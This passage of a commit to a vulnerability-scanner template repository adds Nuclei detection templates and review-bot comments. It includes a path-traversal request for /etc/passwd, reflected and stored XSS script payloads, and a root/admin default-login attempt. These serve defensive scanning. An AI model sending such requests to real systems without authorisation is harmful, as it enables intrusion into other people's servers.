- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
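Review bot: the description has a run-on where a sentence was joined: `Directory Traversal.in the res.sendFile API` should read `Directory Traversal in the res.sendFile API`.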

@ -4,7 +4,7 @@ info:
author: dhiyaneshDk,philippedelteil
severity: critical
name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence,injection,ognl
reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940

@ -0,0 +1,35 @@
id: CVE-2021-26247
info:
name: Unauthenticated XSS Cacti - auth_changepassword.php
author: dhiyaneshDK
severity: medium
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-26247
cwe-id: CWE-79
tags: cve,cve2021,cacti,xss
requests:
- method: GET
path:
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
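Review bot: the description reads as a proof-of-concept instruction (`As an unauthenticated remote user, visit ... to successfully execute the JavaScript payload`) rather than a statement of the flaw. Reword it to describe the weakness, for example `The ref parameter of auth_changepassword.php is reflected in the response without encoding, allowing unauthenticated reflected cross-site scripting.`, which is also what the `cwe-id: CWE-79` entry claims.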

@ -1,12 +1,17 @@
id: CVE-2021-29156
info:
name: LDAP Injection In Openam
name: LDAP Injection In OpenAM
author: melbadry9,xelkomy
severity: high
tags: cve,cve2021,openam,ldap,injection
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
reference:
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
https://hackerone.com/reports/1278050
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
https://portswigger.net/research/hidden-oauth-attack-vectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
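Review bot: the four URLs under `reference:` (from the `https://github.com/sullo/...` line through the `https://portswigger.net/...` line) are not written as YAML list items, so the parser folds them into one plain scalar `https://github.com/... https://hackerone.com/... ...` rather than a list of four references; every other template in this commit uses the `- https://...` form. Prefix each with `- `.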
@ -24,3 +29,5 @@ requests:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'
# Enhanced by cs on 2022/01/24

@ -0,0 +1,47 @@
id: CVE-2021-32682
info:
name: elFinder - Multiple vulnerabilities leading to RCE
author: smaranchand
severity: critical
tags: cve,cve2021,elfinder,misconfig,rce,oss
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
reference:
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
remediation: Update to elFinder 2.1.59
metadata:
github: https://github.com/Studio-42/elFinder
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-32682
cwe-id: CWE-22,CWE-78,CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
- "{{BaseURL}}/assets/elFinder/elfinder.html"
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "elfinder"
- "php/connector"
condition: and
- type: status
status:
- 200
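Review bot: the matchers only confirm that an elFinder page referencing `php/connector` is served; they do not establish version 2.1.58 or any of the CWE-22/78/918 conditions, so this `critical`-severity template fires equally on installs already on 2.1.59 (the fixed version named in `remediation`). Either add a version check against the affected range, or state in `name`/`description` that this detects an exposed elFinder connector rather than confirming CVE-2021-32682.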

View File

@ -0,0 +1,36 @@
id: CVE-2021-32853
info:
name: Erxes <= v0.23.0 XSS
author: dwisiswant0
severity: medium
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
metadata:
shodan-query: http.title:"erxes"
tags: cve,cve2021,xss,erxes,oss
requests:
- method: GET
path:
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'topic_id: "</script><script>alert(document.domain)</script>'
- "window.erxesEnv"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
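Review bot: the NVD reference `https://nvd.nist.gov/vuln/detail/CVE-2021-3285` points at a different CVE than `id: CVE-2021-32853`; the final digit is missing. `name` (`Erxes <= v0.23.0`) and `description` (`prior to version 0.23.0`) also disagree on whether 0.23.0 itself is affected, and the template has no `classification:` block (`cve-id`, `cwe-id: CWE-79`) unlike the other CVE templates in this commit.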

View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of sites `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
requests:
- raw:

View File

@ -0,0 +1,48 @@
id: CVE-2021-39350
info:
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
author: gy741
severity: medium
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
reference:
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-39350
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
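Review bot: the second raw request places `</script><script>alert(document.domain)</script>` unencoded in the GET request line; raw requests go out verbatim, and angle brackets, parentheses and the slash in the request target are rejected by some servers and proxies before the plugin ever sees them. Percent-encode the `player_id` value as the AppCMS and Erxes templates in this commit do; the body matcher still works because it checks the reflected, decoded value.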

View File

@ -1,7 +1,7 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

View File

@ -0,0 +1,38 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
tags: cve,cve2021,appcms,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-45380
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '""></script><script>alert(document.domain)</script>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
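Review bot: `condition: and` on the first matcher has no effect with a single entry under `words:`. The `description` also gives the vulnerable file as `\templates\m\inc_head.php` with backslashes while the request path uses `/templates/m/inc_head.php`; use the forward-slash form so the two agree.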

View File

@ -0,0 +1,111 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
tags: cve,cve2021,xss,sourcecodester,authenticated
requests:
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
username={{username}}&password={{password}}&login=
- |
POST /admin/post-avehical.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicletitle"
Test
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="brandname"
1
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicalorcview"
</script><script>alert(document.domain)</script>
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="priceperday"
500
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="fueltype"
Petrol
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="modelyear"
2022
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="seatingcapacity"
5
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img1"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img2"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img3"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img4"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="submit"
------WebKitFormBoundarypWqYipqU21aYgccv--
- |
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
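Review bot: this template has a persistent side effect: the second request creates a new vehicle record through `/admin/post-avehical.php` with the payload stored in `vehicalorcview`, and nothing removes it afterwards, so every run leaves a stored payload on the target. That should be stated in `description` so operators know the template modifies data. Style point: `cvss-score: 5.4` should be `5.40` to match the two-decimal form used by the other templates in this commit.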

View File

@ -4,7 +4,7 @@ info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat
severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/

View File

@ -0,0 +1,33 @@
id: CVE-2022-23944
info:
name: ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462/files
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
cve-id: CVE-2022-23944
cwe-id: CWE-862
tags: cve,cve2022,shenyu,unauth,apache
requests:
- method: GET
path:
- "{{BaseURL}}/plugin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"message":"query success"'
- '"code":200'
condition: and
- type: status
status:
- 200
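Review bot: `author: cckuakilong` looks like a typo; the reapoc reference URL in the same hunk is under `github.com/cckuailong`, and the CVE-2021-46005 template in this commit uses `author: cckuailong`. The `classification:` block also lacks the `cvss-metrics`/`cvss-score` pair the other CVE templates carry.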

View File

@ -0,0 +1,33 @@
id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: critical
tags: mofi,default-login
requests:
- raw:
- |
POST /cgi-bin/luci/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=root&password=admin
attack: pitchfork
payloads:
username:
- root
password:
- admin
matchers-condition: and
matchers:
- type: word
words:
- "MOFI4500 - General - LuCI"
- type: status
status:
- 200
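Review bot: the raw request body is the literal `username=root&password=admin`, so the `username`/`password` lists under `payloads:` (and `attack: pitchfork`) are never substituted; either reference `{{username}}`/`{{password}}` in the body or drop the unused payload block.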

View File

@ -0,0 +1,28 @@
id: bigbluebutton-login
info:
name: BigBlueButton Login Panel
author: myztique
severity: info
reference: https://github.com/bigbluebutton/greenlight
tags: panel,bigbluebutton
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'content="BigBlueButton'
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Greenlight<\/a>\. (.*)'
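Review bot: `matchers-condition: and` is a no-op with a single matcher, and there is no status check, so any response that merely contains `content="BigBlueButton` in a meta tag will match. Add a `status` matcher for 200 as the other panel templates in this commit do, and bound the extractor regex `Greenlight<\/a>\. (.*)` (for example with `([0-9.]+)`) so `version` does not capture the rest of the line.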

View File

@ -0,0 +1,24 @@
id: flightpath-panel
info:
name: FlightPath Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"flightpath"
tags: panel,flightpath
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login | FlightPath</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: jamf-panel
info:
name: JAMF MDM Panel
author: pdteam
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: all
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
condition: or

View File

@ -1,7 +1,7 @@
id: joomla-panel
info:
name: Joomla Panel
name: Joomla! Panel
author: its0x08
severity: info
tags: panel,joomla
@ -16,3 +16,5 @@ requests:
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
- '/administrator/templates/isis/images/joomla.png'
condition: or
# Enhanced by cs on 2022/01/28

View File

@ -0,0 +1,24 @@
id: netdata-dashboard-detect
info:
name: NetData Dashboard Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'Server: NetData Embedded HTTP Server'
tags: netdata,panel,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>netdata dashboard</title>'
- type: status
status:
- 200
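Review bot: the metadata key is `shodan-dork`, whereas every other template in this commit uses `shodan-query`; rename it so tooling that reads `metadata.shodan-query` picks it up. `tags: netdata,panel,tech` also mixes the `tech` and `panel` tags that the other hunks in this commit are separating (e.g. `openam-detect` -> `openam-panel` drops `tech`).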

View File

@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"
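Review bot: two paths in this context, `{{BaseURL}}/sso/UI/#login` and `{{BaseURL}}/openam/UI/#loginlogin`, contain URL fragments; a fragment is never sent to the server, so these requests duplicate `/sso/UI` and `/openam/UI/`, and `#loginlogin` reads like a typo. Drop them, or replace them with the paths they were meant to be, while the file is being reworked. Note also that renaming `id: openam-detect` to `openam-panel` breaks any user include/exclude lists keyed on the old id.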

View File

@ -0,0 +1,28 @@
id: openbmcs-detect
info:
name: openbmcs-detect
author: ffffffff0x
severity: info
tags: openbmcs,detect
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BMS - Login'
- 'Copyright all rights reserved by Open BMCS'
- 'OpenBMCS does not support Internet Explorer'
condition: or
- type: status
status:
- 200
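Review bot: `name: openbmcs-detect` repeats the id instead of giving a human-readable name (the other new templates use forms like `OpenBMCS 2.4 Secrets Disclosure`); and since the `openbmcs-secret-disclosure` and `openbmcs-ssrf` templates in this same commit carry `shodan-query: http.favicon.hash:1550906681`, the same `metadata` block belongs here too. `tags: openbmcs,detect` should use `tech` or `panel` like the other detection templates in this commit.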

View File

@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET

View File

@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body

View File

@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET

View File

@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:

View File

@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200

View File

@ -1,9 +1,10 @@
id: strapi-documentation
info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
name: Strapi Documentation
author: idealphase
severity: info
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
tags: strapi,panel
requests:

View File

@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'
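Review bot: the extractor regex `<script src="/assets/js/threatq.min.js\?(.*)` captures everything to the end of the line, including the closing `"></script>` and whatever follows, so the extracted value is not a clean version string; use `\?([^"]+)` to stop at the closing quote. The `description` is also product marketing copy; a one-line statement of what the template detects would be more useful.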

View File

@ -0,0 +1,26 @@
id: typo3-login
info:
name: TYPO3 Login Detect
author: dadevel
severity: info
tags: panel,typo3
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TYPO3 CMS"
- "typo3-login-form"
- "TYPO3 SVN ID:"
condition: or
- type: status
status:
- 200
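Review bot: `id: typo3-login` / `name: TYPO3 Login Detect` do not follow the `*-panel` id and `... Login Panel` naming this commit applies to the other login-page templates (openam-panel, openx-panel, yzmcms-panel). Also, `TYPO3 SVN ID:` is a header comment from older TYPO3 source files; please confirm it appears in the served `/typo3/` page, otherwise with `condition: or` it only adds matches on exposed source without confirming a panel.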

View File

@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and

View File

@ -0,0 +1,33 @@
id: wallix-accessmanager-panel
info:
name: Wallix Access Manager Panel
author: righettod
severity: info
reference: https://www.wallix.com/privileged-access-management/access-manager/
metadata:
shodan-query: http.title:"Wallix Access Manager"
tags: panel,wallix
requests:
- method: GET
path:
- '{{BaseURL}}/wabam'
- '{{BaseURL}}/wabam/favicon.ico'
stop-at-first-match: true
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(tolower(body), '<title>wallix access manager</title>')"
condition: and
- type: dsl
dsl:
- "status_code==200"
- "('1745235488' == mmh3(base64_py(body)))"
condition: and

View File

@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'
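Review bot: `matchers-condition:` is missing, so the word and status matchers are combined with nuclei's default `or`; any `/app/login` that returns 200, Wazuh or not, will match. Add `matchers-condition: and` as the other panel templates in this commit do.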

View File

@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'

View File

@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'

View File

@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: zblogphp-panel
info:
name: Z-BlogPHP Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Z-BlogPHP"
tags: panel,zblogphp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="generator" content="Z-BlogPHP'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'
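Review bot: the extractor character class `[:A-Z-a-z 0-9.]` reads like a range typo; the `-` between `Z` and `a` is a literal hyphen in Go's regexp, so it works, but `[A-Za-z0-9 .:-]` (hyphen last) says the same thing unambiguously.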

View File

@ -2,9 +2,11 @@ id: manageengine-servicedesk
info:
name: ZOHO ManageEngine ServiceDesk
